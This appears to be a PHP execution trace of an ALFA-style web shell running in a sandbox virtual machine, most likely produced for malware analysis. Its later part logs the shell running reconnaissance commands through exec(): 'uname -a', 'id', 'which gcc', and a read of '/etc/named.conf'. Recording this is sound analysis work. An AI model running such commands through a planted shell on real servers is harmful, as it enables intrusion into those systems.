6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#27979B', 'multi_selector' => ['input[type=submit]:hover' => 'box-shadow:0 0 4px {color};border:2px solid {color};', '.button:hover,#addup:hover' => 'box-shadow:0 0 4px {color};border:1px solid {color};']]
6	235	1	0.013645	438400
6	235	R			'#27979B'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#27979B'
6	236	0	0.013669	438400	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#27979B'	'box-shadow:0 0 4px {color};border:2px solid {color};'
6	236	1	0.013687	438576
6	236	R			'box-shadow:0 0 4px #27979B;border:2px solid #27979B;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'box-shadow:0 0 4px #27979B;border:2px solid #27979B;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= 'input[type=submit]:hover{box-shadow:0 0 4px #27979B;border:2px solid #27979B;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.button:hover,#addup:hover'
6	237	0	0.013749	438936	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'button:hover'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#27979B', 'multi_selector' => ['input[type=submit]:hover' => 'box-shadow:0 0 4px {color};border:2px solid {color};', '.button:hover,#addup:hover' => 'box-shadow:0 0 4px {color};border:1px solid {color};']]
6	237	1	0.013783	438936
6	237	R			'#27979B'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#27979B'
6	238	0	0.013808	438936	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#27979B'	'box-shadow:0 0 4px {color};border:1px solid {color};'
6	238	1	0.013824	439112
6	238	R			'box-shadow:0 0 4px #27979B;border:1px solid #27979B;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'box-shadow:0 0 4px #27979B;border:1px solid #27979B;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.button:hover,#addup:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'outputs_text'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.ml1'
6	239	0	0.013892	438936	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'outputs_text'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#67ABDF', 'multi_selector' => ['.ml1' => 'color: {color};']]
6	239	1	0.013922	438936
6	239	R			'#67ABDF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#67ABDF'
6	240	0	0.013947	438936	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#67ABDF'	'color: {color};'
6	240	1	0.013963	439072
6	240	R			'color: #67ABDF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #67ABDF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.ml1{color: #67ABDF;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'outputs_border'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.ml1'
6	241	0	0.014023	438896	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'outputs_border'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#0E304A', 'multi_selector' => ['.ml1' => 'border: 1px solid {color};']]
6	241	1	0.014054	438896
6	241	R			'#0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#0E304A'
6	242	0	0.014079	438896	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#0E304A'	'border: 1px solid {color};'
6	242	1	0.014095	439048
6	242	R			'border: 1px solid #0E304A;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'border: 1px solid #0E304A;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.ml1{border: 1px solid #0E304A;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'uploader_border'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.inputfile'
6	243	0	0.014157	438912	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'uploader_border'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#0E304A', 'multi_selector' => ['.inputfile' => 'box-shadow:0 0 4px {color};border:1px solid {color};']]
6	243	1	0.014189	438912
6	243	R			'#0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#0E304A'
6	244	0	0.014214	438912	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#0E304A'	'box-shadow:0 0 4px {color};border:1px solid {color};'
6	244	1	0.014231	439088
6	244	R			'box-shadow:0 0 4px #0E304A;border:1px solid #0E304A;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'box-shadow:0 0 4px #0E304A;border:1px solid #0E304A;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.inputfile{box-shadow:0 0 4px #0E304A;border:1px solid #0E304A;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'uploader_background'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.inputfile strong'
6	245	0	0.014303	438936	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'uploader_background'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#0E304A', 'multi_selector' => ['.inputfile strong' => 'background-color: {color};']]
6	245	1	0.014335	438936
6	245	R			'#0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#0E304A'
6	246	0	0.014360	438936	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#0E304A'	'background-color: {color};'
6	246	1	0.014376	439088
6	246	R			'background-color: #0E304A;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'background-color: #0E304A;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.inputfile strong{background-color: #0E304A;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'uploader_text_right'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.inputfile strong'
6	247	0	0.014441	438912	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'uploader_text_right'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#FFFFFF', 'multi_selector' => ['.inputfile strong' => 'color: {color};']]
6	247	1	0.014472	438912
6	247	R			'#FFFFFF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#FFFFFF'
6	248	0	0.014497	438912	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#FFFFFF'	'color: {color};'
6	248	1	0.014513	439048
6	248	R			'color: #FFFFFF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #FFFFFF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.inputfile strong{color: #FFFFFF;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'uploader_text_left'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.inputfile span'
6	249	0	0.014573	438896	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'uploader_text_left'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#25ff00', 'multi_selector' => ['.inputfile span' => 'color: {color};']]
6	249	1	0.014603	438896
6	249	R			'#25ff00'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#25ff00'
6	250	0	0.014628	438896	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#25ff00'	'color: {color};'
6	250	1	0.014643	439032
6	250	R			'color: #25ff00;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #25ff00;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.inputfile span{color: #25ff00;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'uploader:hover'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.inputfile:hover'
6	251	0	0.014704	438896	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'uploader:hover'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#27979B', 'multi_selector' => ['.inputfile:hover' => 'box-shadow:0 0 4px {color};border:1px solid {color};']]
6	251	1	0.014746	438896
6	251	R			'#27979B'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#27979B'
6	252	0	0.014772	438896	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#27979B'	'box-shadow:0 0 4px {color};border:1px solid {color};'
6	252	1	0.014789	439072
6	252	R			'box-shadow:0 0 4px #27979B;border:1px solid #27979B;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'box-shadow:0 0 4px #27979B;border:1px solid #27979B;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.inputfile:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'uploader_progress_bar'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.up_bar'
6	253	0	0.014858	438936	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'uploader_progress_bar'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#00ff00', 'multi_selector' => ['.up_bar' => 'background-color: {color};']]
6	253	1	0.014894	438936
6	253	R			'#00ff00'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#00ff00'
6	254	0	0.014918	438936	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#00ff00'	'background-color: {color};'
6	254	1	0.014935	439088
6	254	R			'background-color: #00ff00;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'background-color: #00ff00;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.up_bar{background-color: #00ff00;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'mysql_tables'
6	255	0	0.014987	438912	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'mysql_tables'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#00FF00'
6	255	1	0.015011	438912
6	255	R			'#00FF00'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#00FF00'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.mysql_tables{color: #00FF00;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'mysql_table_count'
6	256	0	0.015059	438912	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'mysql_table_count'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#67ABDF'
6	256	1	0.015085	438912
6	256	R			'#67ABDF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#67ABDF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.mysql_table_count{color: #67ABDF;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'copyright'
6	257	0	0.015133	438912	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'copyright'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#dfff00'
6	257	1	0.015158	438912
6	257	R			'#dfff00'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#dfff00'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.copyright{color: #dfff00;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'scrollbar'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '*::-webkit-scrollbar-thumb'
6	258	0	0.015217	438912	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'scrollbar'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#1e82b5', 'multi_selector' => ['*::-webkit-scrollbar-thumb' => 'background-color: {color};']]
6	258	1	0.015249	438912
6	258	R			'#1e82b5'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#1e82b5'
6	259	0	0.015273	438912	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#1e82b5'	'background-color: {color};'
6	259	1	0.015290	439064
6	259	R			'background-color: #1e82b5;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'background-color: #1e82b5;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '*::-webkit-scrollbar-thumb{background-color: #1e82b5;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'scrollbar_background'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '*::-webkit-scrollbar-track'
6	260	0	0.015357	439936	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'scrollbar_background'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#000115', 'multi_selector' => ['*::-webkit-scrollbar-track' => 'background-color: {color};']]
6	260	1	0.015388	439936
6	260	R			'#000115'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#000115'
6	261	0	0.015413	439936	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#000115'	'background-color: {color};'
6	261	1	0.015429	440088
6	261	R			'background-color: #000115;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'background-color: #000115;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '*::-webkit-scrollbar-track{background-color: #000115;}'
5	130	1	0.015475	439880
5	130	R			'.header{border: 7px solid #0E304A}#meunlist{border-color: #0E304A}#hidden_sh{background-color: #0E304A}.ajaxarea{border: 1px solid #0E304A}.foot{border-color: #0E304A}.header_vars{color: #27979B;}.header_values{color: #67ABDF;}.header_on{color: #00FF00;}.header_off{color: #ff0000;}.header_none{color: #00FF00;}.home_shell{color: #ff0000;}.home_shell:hover{color: #FFFFFF;}.back_shell{color: #efbe73;}.back_shell:hover{color: #FFFFFF;}.header_pwd{color: #00FF00;}.header_pwd:hover{color: #FFFFFF;}.header_drive{c'
5	262	0	0.015721	423496	htmlspecialchars	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1073	1	'/var/www/html/uploads/'
5	262	1	0.015740	423688
5	262	R			'/var/www/html/uploads/'
5	263	0	0.015756	423608	htmlspecialchars	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1074	1	'FilesMan2'
5	263	1	0.015771	423800
5	263	R			'FilesMan2'
5	264	0	0.015786	423656	htmlspecialchars	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1075	1	'Windows-1251'
5	264	1	0.015799	423848
5	264	R			'Windows-1251'
5	265	0	0.016594	435784	__showicon	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1086	1	'loader'
5	265	1	0.016614	435784
5	265	R			'http://solevisible.com/images/loader.svg'
5	266	0	0.016633	435784	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1087	4	'uname -a'	FALSE	FALSE	???
6	267	0	0.016650	435784	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'uname -a'	FALSE
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
7	268	0	0.016678	435784	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
7	268	1	0.016692	435824
7	268	R			TRUE
7	269	0	0.016706	435808	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'uname -a'	''
7	269	1	0.017797	436568
7	269	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux'
7	270	0	0.017833	436344	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[0 => 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux']
7	270	1	0.017856	436408
7	270	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux'
6	267	1	0.017896	435944
6	267	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux'
5	266	1	0.017935	435944
5	266	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1087	$cmd_uname = 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux'
5	271	0	0.017971	435944	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1088	1	'php_uname'
5	271	1	0.017986	435984
5	271	R			TRUE
5	272	0	0.018000	435944	php_uname	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1088	0
5	272	1	0.018014	436056
5	272	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
5	273	0	0.018033	436056	substr	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1088	3	'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'	0	120
5	273	1	0.018052	436152
5	273	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1088	$uname = 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1098	$s = 1
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1098	++$s
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1098	++$s
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1098	++$s
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1098	++$s
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1098	++$s
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1098	++$s
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1098	++$s
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1098	++$s
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1098	++$s
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1098	++$s
5	274	0	0.018190	437336	phpversion	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1116	0
5	274	1	0.018203	437400
5	274	R			'7.2.34-37+ubuntu22.04.1+deb.sury.org+1'
5	275	0	0.018223	437848	date	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1124	1	'Y-m-d H:i:s'
5	275	1	0.018287	440200
5	275	R			'2023-02-12 23:16:00'
5	276	0	0.018311	438120	_alfa_file	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1130	2	'/etc/named.conf'	FALSE
6	277	0	0.018328	438120	file	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2507	1	'/etc/named.conf'
6	277	1	0.018359	438272
6	277	R			FALSE
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2507	$array = FALSE
6	278	0	0.018386	438232	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2509	4	'id'	FALSE	FALSE	???
7	279	0	0.018401	438232	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'id'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	280	0	0.018427	438232	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	280	1	0.018441	438272
8	280	R			TRUE
8	281	0	0.018454	438256	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'id'	''
8	281	1	0.020015	438856
8	281	R			'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
8	282	0	0.020060	438712	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[0 => 'uid=33(www-data) gid=33(www-data) groups=33(www-data)']
8	282	1	0.020080	438776
8	282	R			'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
7	279	1	0.020113	438312
7	279	R			'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
6	278	1	0.020144	438312
6	278	R			'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
6	283	0	0.020163	438232	addslashes	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2510	1	'/etc/named.conf'
6	283	1	0.020179	438264
6	283	R			'/etc/named.conf'
6	284	0	0.020195	438280	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2510	4	'cat "/etc/named.conf"'	FALSE	FALSE	???
7	285	0	0.020211	438280	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'cat "/etc/named.conf"'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	286	0	0.020238	438280	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	286	1	0.020253	438320
8	286	R			TRUE
8	287	0	0.020266	438304	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'cat "/etc/named.conf"'	''
8	287	1	0.021517	438424
8	287	R			''
8	288	0	0.021550	438360	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[]
8	288	1	0.021568	438424
8	288	R			''
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = ''
7	285	1	0.021595	438280
7	285	R			''
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = ''
6	284	1	0.021621	438280
6	284	R			''
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2510	$data = ''
5	276	1	0.021646	438232
5	276	R			FALSE
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1130	$d0mains = FALSE
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1131	GLOBALS['need_to_update_header'] = 'true'
5	289	0	0.021691	438232	alfaSize	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1146	1	232015802368
6	290	0	0.021708	438232	sprintf	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2411	2	'%1.2f'	216.08155441284
6	290	1	0.021725	438616
6	290	R			'216.08'
5	289	1	0.021739	438272
5	289	R			'216.08 GB'
5	291	0	0.021753	438456	alfaSize	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1146	1	194105184256
6	292	0	0.021776	438456	sprintf	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2411	2	'%1.2f'	180.77453994751
6	292	1	0.021790	438840
6	292	R			'180.77'
5	291	1	0.021804	438496
5	291	R			'180.77 GB'
5	293	0	0.021821	438232	ini_get	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1150	1	'safe_mode'
5	293	1	0.021836	438264
5	293	R			FALSE
5	294	0	0.021849	438232	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1151	4	'id'	FALSE	FALSE	???
6	295	0	0.021864	438232	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'id'	FALSE
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
7	296	0	0.021889	438232	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
7	296	1	0.021903	438272
7	296	R			TRUE
7	297	0	0.021916	438256	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'id'	''
7	297	1	0.023387	438856
7	297	R			'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
7	298	0	0.023417	438712	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[0 => 'uid=33(www-data) gid=33(www-data) groups=33(www-data)']
7	298	1	0.023435	438776
7	298	R			'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
6	295	1	0.023467	438312
6	295	R			'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
5	294	1	0.023496	438312
5	294	R			'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1154	$x = 0
5	299	0	0.023525	438232	alfaWhich	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	1	'gcc'
6	300	0	0.023540	438272	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	4	'which gcc'	FALSE	FALSE	???
7	301	0	0.023556	438272	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'which gcc'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	302	0	0.023581	438272	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	302	1	0.023595	438312
8	302	R			TRUE
8	303	0	0.023608	438296	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'which gcc'	''
8	303	1	0.024918	438816
8	303	R			'/usr/bin/gcc'
8	304	0	0.024945	438712	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[0 => '/usr/bin/gcc']
8	304	1	0.024962	438776
8	304	R			'/usr/bin/gcc'
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = '/usr/bin/gcc'
7	301	1	0.024991	438312
7	301	R			'/usr/bin/gcc'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = '/usr/bin/gcc'
6	300	1	0.025017	438312
6	300	R			'/usr/bin/gcc'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	$path = '/usr/bin/gcc'
5	299	1	0.025043	438232
5	299	R			12
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	++$x
